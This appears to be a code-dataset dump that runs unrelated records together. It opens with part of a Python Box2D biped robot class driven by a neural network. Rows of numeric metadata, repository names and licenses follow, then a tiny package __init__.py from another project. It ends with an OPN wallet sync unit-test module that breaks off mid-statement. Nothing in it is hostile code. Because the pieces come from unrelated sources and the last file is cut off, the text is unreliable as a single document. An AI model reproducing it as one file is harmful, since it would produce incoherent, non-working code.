                localAnchorA = (0.0, -0.55),
                localAnchorB = (0.3, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 20.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.body,
                bodyB = self.rthigh,
                collideConnected = False,
                localAnchorA = (0.0, -0.55),
                localAnchorB = (-0.3, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 20.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.rthigh,
                bodyB = self.rleg,
                collideConnected = False,
                localAnchorA = (0.3, 0),
                localAnchorB = (-0.36, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.rleg,
                bodyB = self.rfoot,
                collideConnected = False,
                localAnchorA = (0.36, 0),
                localAnchorB = (-0.2, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
    def update(self, sensors, mirror=False):
        """Feed sensor readings through the network and drive the motors.

        sensors: 6 contact-sensor readings, ordered left to right.
        mirror:  force mirror mode (also entered when the target is to
                 the left, dpos.x < 0).
        """
        dpos = self.target - self.body.position
        if dpos.length > 1: # Radius of sight
            dpos.Normalize()
        # Joint angles normalized from [0, 2*pi) onto [-1, 1).
        joint_angles = [(j.angle % (2*pi)) / pi - 1 for j in self.joints]
        # Make the limbs angle list symmetric (second half *= -1)
        for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
            joint_angles[i] *= -1
        # Add body angle sensor, range [-180, 180] maps to [-1, 1]
        body_angle = ((self.bodies[0].angle + pi) % (2 * pi) - pi) / pi
        self.sensors = [dpos.x, dpos.y] + joint_angles + sensors + [body_angle]
        if dpos.x < 0 or mirror:
            # Mirror mode: flip x and reverse left/right ordering so the
            # same network can walk both directions.
            self.sensors = [-dpos.x, dpos.y] + joint_angles[::-1] + sensors[::-1] + [body_angle]
        # Send input to neural network
        self.nn.feedforward(self.sensors)
        # Read output from neural network.  Ankles get a 5x speed scale,
        # knees and hips 15x.  Note both branches negate the outputs; only
        # the joint order differs between mirror and normal mode.
        if dpos.x < 0 or mirror:
            # Mirror mode
            self.joints[0].motorSpeed = -self.nn.output[5]*5.0
            self.joints[1].motorSpeed = -self.nn.output[4]*15.0
            self.joints[2].motorSpeed = -self.nn.output[3]*15.0
            self.joints[3].motorSpeed = -self.nn.output[2]*15.0
            self.joints[4].motorSpeed = -self.nn.output[1]*15.0
            self.joints[5].motorSpeed = -self.nn.output[0]*5.0
        else:
            self.joints[0].motorSpeed = -self.nn.output[0]*5.0
            self.joints[1].motorSpeed = -self.nn.output[1]*15.0
            self.joints[2].motorSpeed = -self.nn.output[2]*15.0
            self.joints[3].motorSpeed = -self.nn.output[3]*15.0
            self.joints[4].motorSpeed = -self.nn.output[4]*15.0
            self.joints[5].motorSpeed = -self.nn.output[5]*5.0
class Boulotron2001(Animatronic):
    """Round-bodied biped animatronic driven by a neural network.

    Neural network input layer:
    [pos.x] [pos.y] [joints x 6] [contact_sensors x 6] [body_angle]
    Contact sensors:
    - lfoot
    - lheel
    - lbody
    - rbody
    - rheel
    - rfoot
    Other sensors:
    - body_angle
    """
    # NOTE: original docstring opened with four quotes (""""), leaving a stray
    # quote character at the start of the docstring text; fixed above.

    def __init__(self, world):
        self.morpho = "Boulotron2001"
        self.n_contact_sensors = 6
        # 2 target-direction inputs + 6 joint angles + 6 contact sensors
        # + 1 body-angle sensor.
        self.n_inputs = 2 + 6 + 6 + 1
        super().__init__(world)

    def init_body(self):
        """
        Order of defining joints and sensors is important
        self.joints must be symetrical so it can be reversed for mirror mode
        Sensors number (n):
        (0)---X(1)-----x-----(2) [[[ BODY ]]] (3)-----x-----(4)X---(5)
        """
        self.bodies = []
        # Torso: a single dynamic circle.
        self.body = self.world.CreateDynamicBody(position=self.start_position)
        self.body.CreateCircleFixture(pos=(0.0, 0.0), radius=0.6, density=0.5,
                                      userData=self)
        self.bodies.append(self.body)
        ## Ground/Body sensors (contact sensors 2 and 3)
        self.body.CreateCircleFixture(pos=(-0.58, -0.1), radius=0.15,
                                      density=0,
                                      isSensor=True, userData=(self.id, 2))
        self.body.CreateCircleFixture(pos=(0.58, -0.1), radius=0.15,
                                      density=0,
                                      isSensor=True, userData=(self.id, 3))
        # Thighs. groupIndex=-1 keeps the limb fixtures from colliding
        # with each other.
        self.lthigh = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1,
                                                   friction=0.3, userData=self)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.lthigh)
        self.rthigh = self.world.CreateDynamicBody(position=self.start_position)
        # BUGFIX: userData=self was missing on this fixture only, unlike
        # every other limb fixture (lthigh, lleg, rleg, feet).
        fixture = self.rthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1,
                                                   friction=0.3, userData=self)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.rthigh)
        # Legs
        self.lleg = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lleg.CreatePolygonFixture(box=(0.36, 0.1), density=1,
                                                 friction=0.3, userData=self)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.lleg)
        self.rleg = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.rleg.CreatePolygonFixture(box=(0.36, 0.1), density=1,
                                                 friction=0.3, userData=self)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.rleg)
        ## Heel sensors (contact sensors 1 and 4)
        self.lleg.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
                                      density=1, friction=1.0, restitution=0.0,
                                      userData=(self.id, 1), groupIndex=-1)
        self.rleg.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
                                      density=1, friction=1.0, restitution=0.0,
                                      userData=(self.id, 4), groupIndex=-1)
        # Feet
        self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lfoot.CreatePolygonFixture(box=(0.1, 0.08), density=1,
                                                  friction=0.3, userData=self)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.lfoot)
        self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.rfoot.CreatePolygonFixture(box=(0.1, 0.08), density=1,
                                                  friction=0.3, userData=self)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.rfoot)
        ## Feet sensors (contact sensors 0 and 5)
        self.lfoot.CreateCircleFixture(pos=(-0.1, 0), radius=0.15,
                                       density=1, friction=1.0,
                                       restitution=0.0,
                                       userData=(self.id, 0), groupIndex=-1)
        self.rfoot.CreateCircleFixture(pos=(0.1, 0), radius=0.15,
                                       density=1, friction=1.0,
                                       restitution=0.0,
                                       userData=(self.id, 5), groupIndex=-1)
        # Contact sensors
        self.world.contactListener.registerSensors(self.id,
                                                   self.n_contact_sensors)
        # Revolute joints, listed left-to-right so the list is symmetric
        # and can be reversed for mirror mode:
        # (bodyA, bodyB, localAnchorA, localAnchorB, maxMotorTorque)
        joint_params = [
            (self.lleg, self.lfoot, (-0.36, 0), (0.2, 0), 10.0),
            (self.lthigh, self.lleg, (-0.3, 0), (0.36, 0), 10.0),
            (self.body, self.lthigh, (-0.35, -0.4), (0.3, 0), 20.0),
            (self.body, self.rthigh, (0.35, -0.4), (-0.3, 0), 20.0),
            (self.rthigh, self.rleg, (0.3, 0), (-0.36, 0), 10.0),
            (self.rleg, self.rfoot, (0.36, 0), (-0.2, 0), 10.0),
        ]
        self.joints = []
        for bodyA, bodyB, anchorA, anchorB, torque in joint_params:
            self.joints.append(
                self.world.CreateRevoluteJoint(
                    bodyA=bodyA,
                    bodyB=bodyB,
                    collideConnected=False,
                    localAnchorA=anchorA,
                    localAnchorB=anchorB,
                    referenceAngle=pi,
                    enableMotor=True,
                    motorSpeed=0.0,
                    maxMotorTorque=torque,
                ))

    def update(self, sensors, mirror=False):
        """Feed sensor readings through the neural network and drive joints.

        Parameters:
            sensors: list of contact-sensor values, ordered left-to-right.
            mirror: force mirror mode even when the target lies to the right.
        """
        # Vector from body to target, clamped to unit length.
        dpos = self.target - self.body.position
        if dpos.length > 1:  # Radius of sight
            dpos.Normalize()
        # Joint angles normalized from [0, 2*pi) to [-1, 1).
        joint_angles = [(j.angle % (2 * pi)) / pi - 1 for j in self.joints]
        # Make the limbs angle list symmetric (second half *= -1)
        half = len(joint_angles) // 2 + len(joint_angles) % 2
        for i in range(half, len(joint_angles)):
            joint_angles[i] *= -1
        # Body angle sensor, range [-180, 180] maps to [-1, 1]
        body_angle = ((self.bodies[0].angle + pi) % (2 * pi) - pi) / pi
        mirrored = dpos.x < 0 or mirror
        if mirrored:
            # Mirror mode: flip x and reverse the symmetric lists.
            self.sensors = ([-dpos.x, dpos.y] + joint_angles[::-1]
                            + sensors[::-1] + [body_angle])
        else:
            self.sensors = ([dpos.x, dpos.y] + joint_angles
                            + sensors + [body_angle])
        # Send input to neural network
        self.nn.feedforward(self.sensors)
        # Read output from neural network; gains are symmetric
        # (feet 2.0, knees 5.0, hips 8.0), so mirroring reverses outputs.
        gains = [2.0, 5.0, 8.0, 8.0, 5.0, 2.0]
        outputs = self.nn.output[::-1] if mirrored else self.nn.output
        for joint, out, gain in zip(self.joints, outputs, gains):
            joint.motorSpeed = -out * gain
| 39.645197
| 114
| 0.476938
| 3,675
| 36,315
| 4.668027
| 0.063673
| 0.045468
| 0.039172
| 0.053862
| 0.904576
| 0.900495
| 0.898514
| 0.898164
| 0.884115
| 0.8348
| 0
| 0.050747
| 0.412337
| 36,315
| 915
| 115
| 39.688525
| 0.752823
| 0.084786
| 0
| 0.807512
| 0
| 0
| 0.001963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034429
| false
| 0
| 0.007825
| 0
| 0.056338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c6b9af7f169658ff911cd2e7382c8e9deeaf192a
| 73
|
py
|
Python
|
frazzl/__init__.py
|
jimtheplant/qraphql-booster
|
cc905310ca19c32e8c555c54069a0ac5b127d505
|
[
"Apache-2.0"
] | 2
|
2019-11-20T16:18:53.000Z
|
2020-05-25T11:00:58.000Z
|
frazzl/__init__.py
|
jimtheplant/qraphql-booster
|
cc905310ca19c32e8c555c54069a0ac5b127d505
|
[
"Apache-2.0"
] | null | null | null |
frazzl/__init__.py
|
jimtheplant/qraphql-booster
|
cc905310ca19c32e8c555c54069a0ac5b127d505
|
[
"Apache-2.0"
] | null | null | null |
# Package initializer: expose the package's types and wire up services.
from .services import init_services
from .types import *

# Register all services as an import-time side effect.
init_services()
| 18.25
| 35
| 0.808219
| 10
| 73
| 5.7
| 0.5
| 0.350877
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123288
| 73
| 3
| 36
| 24.333333
| 0.890625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
05f9e7c57e37300b0379535f9e6a1a468a2cb130
| 60,559
|
py
|
Python
|
backend/opnreco/api/tests/test_syncapi.py
|
OpenPaymentNetwork/opnreco
|
99c8955d7e200fe11fc23c3568879c543940b168
|
[
"MIT"
] | null | null | null |
backend/opnreco/api/tests/test_syncapi.py
|
OpenPaymentNetwork/opnreco
|
99c8955d7e200fe11fc23c3568879c543940b168
|
[
"MIT"
] | null | null | null |
backend/opnreco/api/tests/test_syncapi.py
|
OpenPaymentNetwork/opnreco
|
99c8955d7e200fe11fc23c3568879c543940b168
|
[
"MIT"
] | null | null | null |
from decimal import Decimal
from opnreco.testing import DBSessionFixture
import datetime
import os
import pyramid.testing
import responses
import unittest
# Decimal zero, shared by assertions that compare monetary deltas.
zero = Decimal()
def setup_module():
    """Create the database session fixture shared by all tests in this module."""
    global dbsession_fixture
    dbsession_fixture = DBSessionFixture()
def teardown_module():
    """Dispose of the module-level database session fixture."""
    dbsession_fixture.close()
class TestSyncAPI(unittest.TestCase):
def setUp(self):
    """Point the OPN API at a test URL and open a fresh DB session."""
    os.environ['opn_api_url'] = 'https://opn.example.com:9999'
    self.config = pyramid.testing.setUp()
    self.dbsession, self.close_session = dbsession_fixture.begin_session()
def tearDown(self):
    """Close the DB session and tear down the Pyramid test configuration."""
    self.close_session()
    pyramid.testing.tearDown()
@property
def _class(self):
    """The class under test, imported lazily so import errors surface per-test."""
    from ..syncapi import SyncAPI
    return SyncAPI
def _make(
        self,
        owner_id='11',
        file_type='open_circ',
        auto_enable_loops=False):
    """Build a SyncAPI instance wired to a test Owner, File and request.

    Returns the callable SyncAPI object with an empty change_log.
    """
    from opnreco.models.db import Owner
    from opnreco.models.db import File
    owner = Owner(
        id=owner_id,
        title="Test Profile",
        username='testy',
    )
    self.dbsession.add(owner)
    self.dbsession.flush()
    file = File(
        id=1239,
        owner_id=owner_id,
        file_type=file_type,
        title='Test File',
        currency='USD',
        has_vault=True,
        auto_enable_loops=auto_enable_loops)
    self.dbsession.add(file)
    self.dbsession.flush()
    # Dummy request carrying the auth/session attributes SyncAPI reads.
    request = pyramid.testing.DummyRequest(
        dbsession=self.dbsession,
        owner=owner,
        personal_id='12',
        access_token='example-token',
        remote_addr='127.0.0.1',
        user_agent='Test UA',
        wallet_info={'profile': {'accounts': [{
            'id': '1102',
            'redacted_account_num': 'XXX45',
            'rdfi_name': "Test Bank",
            'alias': 'myacct',
        }]}},
    )
    obj = self._class(request)
    obj.change_log = []
    return obj
@responses.activate
def test_with_no_transfers(self):
    """An empty history_sync result stores a download and log entry only."""
    from opnreco.models import db
    responses.add(
        responses.POST,
        'https://opn.example.com:9999/wallet/history_sync',
        json={
            'results': [],
            'more': False,
            'first_sync_ts': None,
            'last_sync_ts': None,
        })
    obj = self._make()
    obj()
    # The raw download is recorded even when there are no transfers.
    downloads = self.dbsession.query(db.OPNDownload).all()
    self.assertEqual(1, len(downloads))
    self.assertEqual('11', downloads[0].owner_id)
    events = (
        self.dbsession.query(db.OwnerLog)
        .order_by(db.OwnerLog.id)
        .all())
    self.assertEqual(1, len(events))
    self.assertEqual('11', events[0].owner_id)
    self.assertEqual('opn_sync', events[0].event_type)
    # No transfer records are created.
    records = self.dbsession.query(db.TransferRecord).all()
    self.assertEqual(0, len(records))
@responses.activate
def test_redeem_from_sender_perspective(self):
    """Sync a completed redeem transfer seen by the sending wallet owner.

    The owner's wallet deposits to a DFI account; each issuer loop should
    produce one movement with a negative wallet_delta.
    """
    from opnreco.models import db
    responses.add(
        responses.POST,
        'https://opn.example.com:9999/wallet/history_sync',
        json={
            'results': [{
                'id': '500',
                'workflow_type': 'redeem',
                'start': '2018-08-01T04:05:06Z',
                'currency': 'USD',
                'amount': '1.25',
                'timestamp': '2018-08-01T04:05:08Z',
                'next_activity': 'completed',
                'completed': True,
                'canceled': False,
                'sender_id': '11',
                'sender_uid': 'wingcash:11',
                'sender_info': {
                    'title': "Tester",
                    'screen_name': 'testy',
                },
                'recipient_id': '1102',
                'recipient_uid': 'wingcash:1102',
                'recipient_info': {
                    'title': "Acct",
                    'is_dfi_account': True,
                },
                'movements': [{
                    'number': 2,
                    'timestamp': '2018-01-02T05:06:07Z',
                    'action': 'deposit',
                    'from_id': '11',
                    'to_id': '1102',
                    # Two loops with different issuers in one movement.
                    'loops': [
                        {
                            'currency': 'USD',
                            'loop_id': '0',
                            'amount': '1.00',
                            'issuer_id': '19',
                        },
                        {
                            'currency': 'USD',
                            'loop_id': '0',
                            'amount': '0.25',
                            'issuer_id': '20',
                        },
                    ],
                }],
            }],
            'more': False,
            'first_sync_ts': '2018-08-01T04:05:10Z',
            'last_sync_ts': '2018-08-01T04:05:11Z',
        })
    # Profile lookups performed while adding peers.
    responses.add(
        responses.GET,
        'https://opn.example.com:9999/p/19',
        json={'title': "Super Bank 19", 'username': 'bank19'})
    responses.add(
        responses.GET,
        'https://opn.example.com:9999/p/20',
        json={'title': "Super Bank 20", 'username': 'bank20'})
    responses.add(
        responses.GET,
        'https://opn.example.com:9999/p/1102',
        json={'title': "Tester's Super Bank Checking Account"})
    obj = self._make()
    obj()
    downloads = self.dbsession.query(db.OPNDownload).all()
    self.assertEqual(1, len(downloads))
    self.assertEqual('11', downloads[0].owner_id)
    events = self.dbsession.query(db.OwnerLog).all()
    self.assertEqual([
        'opn_sync',
        'peer_add',
        'peer_add',
        'add_period_for_sync',
    ], [e.event_type for e in events])
    event = events[0]
    self.assertEqual('11', event.owner_id)
    self.assertEqual(
        {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
        set(event.content.keys()))
    records = self.dbsession.query(db.TransferRecord).all()
    self.assertEqual(1, len(records))
    record = records[0]
    self.assertEqual('redeem', record.workflow_type)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
    self.assertEqual(True, record.completed)
    self.assertEqual(False, record.canceled)
    self.assertEqual('11', record.sender_id)
    self.assertEqual('wingcash:11', record.sender_uid)
    self.assertEqual('1102', record.recipient_id)
    self.assertEqual('wingcash:1102', record.recipient_uid)
    # Two peers: the owner's own profile and the DFI account (titled from
    # the request's wallet_info, not the /p/1102 lookup).
    peers = self.dbsession.query(db.Peer).order_by(db.Peer.peer_id).all()
    self.assertEqual(2, len(peers))
    self.assertEqual('11', peers[0].owner_id)
    self.assertEqual('11', peers[0].peer_id)
    self.assertEqual('Test Profile', peers[0].title)
    self.assertEqual('testy', peers[0].username)
    self.assertEqual(False, peers[0].is_dfi_account)
    self.assertEqual('11', peers[1].owner_id)
    self.assertEqual('1102', peers[1].peer_id)
    self.assertEqual('XXX45 at Test Bank (myacct)', peers[1].title)
    self.assertEqual('', peers[1].username)
    self.assertEqual(True, peers[1].is_dfi_account)
    periods = (self.dbsession.query(db.Period).all())
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('11', period.owner_id)
    self.assertEqual(1239, period.file_id)
    movements = (
        self.dbsession.query(db.FileMovement, db.Movement)
        .join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(2, len(movements))
    # First loop: $1.00 issued by 19 leaves the wallet.
    fm, m = movements[0]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual(2, m.number)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('19', m.issuer_id)
    self.assertEqual(datetime.datetime(2018, 1, 2, 5, 6, 7), m.ts)
    self.assertEqual('1102', fm.peer_id)
    self.assertEqual(Decimal('-1.00'), fm.wallet_delta)
    # Second loop: $0.25 issued by 20 leaves the wallet.
    fm, m = movements[1]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual(2, m.number)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('20', m.issuer_id)
    self.assertEqual(datetime.datetime(2018, 1, 2, 5, 6, 7), m.ts)
    self.assertEqual('1102', fm.peer_id)
    self.assertEqual(Decimal('-0.25'), fm.wallet_delta)
    events = self.dbsession.query(db.FileMovementLog).all()
    self.assertEqual(2, len(events))
    event = events[0]
    self.assertEqual('sync_file_movements', event.event_type)
    # Nothing is auto-reconciled.
    recos = self.dbsession.query(db.Reco).all()
    self.assertEqual(0, len(recos))
@responses.activate
def test_redeem_from_issuer_perspective(self):
    """Sync a redeem transfer seen by the issuer: cash returns to the vault."""
    from opnreco.models import db
    responses.add(
        responses.POST,
        'https://opn.example.com:9999/wallet/history_sync',
        json={
            'results': [{
                'id': '500',
                'workflow_type': 'redeem',
                'start': '2018-08-01T04:05:06Z',
                'currency': 'USD',
                'amount': '1.00',
                'timestamp': '2018-08-01T04:05:08Z',
                'next_activity': 'completed',
                'completed': True,
                'canceled': False,
                'sender_id': '11',
                'sender_uid': 'wingcash:11',
                'sender_info': {
                    'title': "Tester",
                },
                'recipient_id': '1102',
                'recipient_uid': 'wingcash:1102',
                'recipient_info': {
                    'title': "Acct",
                },
                # A single movement deposits the notes back to issuer 19.
                'movements': [{
                    'number': 1,
                    'timestamp': '2018-08-02T05:06:07Z',
                    'action': 'deposit',
                    'from_id': '1102',
                    'to_id': '19',
                    'loops': [{
                        'currency': 'USD',
                        'loop_id': '0',
                        'amount': '1.00',
                        'issuer_id': '19',
                    }],
                }],
            }],
            'more': False,
            'first_sync_ts': '2018-08-01T04:05:10Z',
            'last_sync_ts': '2018-08-01T04:05:11Z',
        })
    responses.add(
        responses.GET,
        'https://opn.example.com:9999/p/19',
        json={'title': "Super Bank 19", 'username': 'bank19'})
    # The owner is the issuer ('19') in this test.
    obj = self._make(owner_id='19')
    obj()
    downloads = self.dbsession.query(db.OPNDownload).all()
    self.assertEqual(1, len(downloads))
    self.assertEqual('19', downloads[0].owner_id)
    events = (
        self.dbsession.query(db.OwnerLog)
        .order_by(db.OwnerLog.id).all())
    self.assertEqual(5, len(events))
    event = events[0]
    self.assertEqual('19', event.owner_id)
    self.assertEqual('opn_sync', event.event_type)
    self.assertEqual(
        {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
        set(event.content.keys()))
    records = self.dbsession.query(db.TransferRecord).all()
    self.assertEqual(1, len(records))
    record = records[0]
    self.assertEqual('redeem', record.workflow_type)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
    self.assertEqual(True, record.completed)
    self.assertEqual(False, record.canceled)
    self.assertEqual('11', record.sender_id)
    self.assertEqual('wingcash:11', record.sender_uid)
    self.assertEqual('1102', record.recipient_id)
    self.assertEqual('wingcash:1102', record.recipient_uid)
    periods = (
        self.dbsession.query(db.Period)
        .all())
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('19', period.owner_id)
    self.assertEqual(1239, period.file_id)
    movements = (
        self.dbsession.query(db.FileMovement, db.Movement)
        .join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(1, len(movements))
    fm, m = movements[0]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('1102', fm.peer_id)
    # The issuer's vault gains the redeemed notes.
    self.assertEqual(Decimal('1.00'), fm.vault_delta)
    events = self.dbsession.query(db.FileMovementLog).all()
    self.assertEqual(1, len(events))
    event = events[0]
    self.assertEqual('sync_file_movements', event.event_type)
    recos = self.dbsession.query(db.Reco).all()
    self.assertEqual(0, len(recos))
@responses.activate
def test_grant_from_recipient_perspective(self):
    """Sync a grant transfer seen by the recipient wallet owner.

    Two grant movements from issuer 19 should each add to wallet_delta.
    """
    from opnreco.models import db
    responses.add(
        responses.POST,
        'https://opn.example.com:9999/wallet/history_sync',
        json={
            'results': [{
                'id': '501',
                'workflow_type': 'grant',
                'start': '2018-08-01T04:05:06Z',
                'currency': 'USD',
                'amount': '1.25',
                'timestamp': '2018-08-01T04:05:08Z',
                'next_activity': 'completed',
                'completed': True,
                'canceled': False,
                'sender_id': '19',
                'sender_uid': 'wingcash:19',
                'sender_info': {
                    'title': "Issuer",
                },
                'recipient_id': '11',
                'recipient_uid': 'wingcash:11',
                'recipient_info': {
                    'title': "Some Tester",
                },
                'movements': [
                    {
                        # Issued $1.00
                        'number': 2,
                        'timestamp': '2018-08-02T05:06:07Z',
                        'action': 'grant',
                        'from_id': '19',
                        'to_id': '11',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '0',
                            'amount': '1.00',
                            'issuer_id': '19',
                        }],
                    }, {
                        # Issued $0.25
                        'number': 3,
                        'timestamp': '2018-08-02T05:06:09Z',
                        'action': 'grant',
                        'from_id': '19',
                        'to_id': '11',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '0',
                            'amount': '0.25',
                            'issuer_id': '19',
                        }],
                    },
                ],
            }],
            'more': False,
            'first_sync_ts': '2018-08-01T04:05:10Z',
            'last_sync_ts': '2018-08-01T04:05:11Z',
        })
    responses.add(
        responses.GET,
        'https://opn.example.com:9999/p/19',
        json={'title': "Super Bank 19", 'username': 'bank19'})
    responses.add(
        responses.GET,
        'https://opn.example.com:9999/p/1102',
        json={'title': "Tester's Super Bank Checking Account"})
    obj = self._make(owner_id='11')
    obj()
    downloads = self.dbsession.query(db.OPNDownload).all()
    self.assertEqual(1, len(downloads))
    self.assertEqual('11', downloads[0].owner_id)
    events = self.dbsession.query(db.OwnerLog).all()
    self.assertEqual([
        'opn_sync',
        'peer_add',
        'peer_add',
        'add_period_for_sync',
    ], [e.event_type for e in events])
    event = events[0]
    self.assertEqual('11', event.owner_id)
    self.assertEqual('opn_sync', event.event_type)
    self.assertEqual(
        {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
        set(event.content.keys()))
    records = self.dbsession.query(db.TransferRecord).all()
    self.assertEqual(1, len(records))
    record = records[0]
    self.assertEqual('grant', record.workflow_type)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
    self.assertEqual(True, record.completed)
    self.assertEqual(False, record.canceled)
    self.assertEqual('19', record.sender_id)
    self.assertEqual('wingcash:19', record.sender_uid)
    self.assertEqual('11', record.recipient_id)
    self.assertEqual('wingcash:11', record.recipient_uid)
    # Peers: the owner's profile and the issuer (titled from sender_info).
    peers = self.dbsession.query(db.Peer).order_by(db.Peer.peer_id).all()
    self.assertEqual(2, len(peers))
    self.assertEqual('11', peers[0].owner_id)
    self.assertEqual('11', peers[0].peer_id)
    self.assertEqual('Test Profile', peers[0].title)
    self.assertEqual('testy', peers[0].username)
    self.assertEqual(False, peers[0].is_dfi_account)
    self.assertEqual('11', peers[1].owner_id)
    self.assertEqual('19', peers[1].peer_id)
    self.assertEqual('Issuer', peers[1].title)
    self.assertEqual(None, peers[1].username)
    self.assertEqual(False, peers[1].is_dfi_account)
    periods = self.dbsession.query(db.Period).all()
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('11', period.owner_id)
    self.assertEqual(1239, period.file_id)
    movements = (
        self.dbsession.query(db.FileMovement, db.Movement)
        .join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(2, len(movements))
    fm, m = movements[0]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('19', fm.peer_id)
    self.assertEqual(Decimal('1.00'), fm.wallet_delta)
    fm, m = movements[1]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('19', fm.peer_id)
    self.assertEqual(Decimal('0.25'), fm.wallet_delta)
    events = self.dbsession.query(db.FileMovementLog).all()
    self.assertEqual(2, len(events))
    event = events[0]
    self.assertEqual('sync_file_movements', event.event_type)
@responses.activate
def test_grant_from_issuer_perspective(self):
    """Sync a grant transfer seen by the issuer.

    The issuance movement itself gets no FileMovement; the two grant
    movements each reduce the vault with zero wallet change.
    """
    from opnreco.models import db
    responses.add(
        responses.POST,
        'https://opn.example.com:9999/wallet/history_sync',
        json={
            'results': [{
                'id': '501',
                'workflow_type': 'grant',
                'start': '2018-08-01T04:05:06Z',
                'currency': 'USD',
                'amount': '1.25',
                'timestamp': '2018-08-01T04:05:08Z',
                'next_activity': 'completed',
                'completed': True,
                'canceled': False,
                'sender_id': '19',
                'sender_uid': 'wingcash:19',
                'sender_info': {
                    'title': "Issuer",
                },
                'recipient_id': '11',
                'recipient_uid': 'wingcash:11',
                'recipient_info': {
                    'title': "Some Tester",
                },
                'movements': [
                    {
                        # Issuance movement
                        'number': 1,
                        'timestamp': '2018-08-02T05:06:06Z',
                        'action': 'issue',
                        'from_id': None,
                        'to_id': '19',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '0',
                            'amount': '1.25',
                            'issuer_id': '19',
                        }],
                    }, {
                        # Issued $1.00
                        'number': 2,
                        'timestamp': '2018-08-02T05:06:07Z',
                        'action': 'grant',
                        'from_id': '19',
                        'to_id': '11',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '0',
                            'amount': '1.00',
                            'issuer_id': '19',
                        }],
                    }, {
                        # Issued $0.25
                        'number': 3,
                        'timestamp': '2018-08-02T05:06:07Z',
                        'action': 'grant',
                        'from_id': '19',
                        'to_id': '11',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '0',
                            'amount': '0.25',
                            'issuer_id': '19',
                        }],
                    },
                ],
            }],
            'more': False,
            'first_sync_ts': '2018-08-01T04:05:10Z',
            'last_sync_ts': '2018-08-01T04:05:11Z',
        })
    obj = self._make(owner_id='19')
    obj()
    downloads = self.dbsession.query(db.OPNDownload).all()
    self.assertEqual(1, len(downloads))
    self.assertEqual('19', downloads[0].owner_id)
    events = (
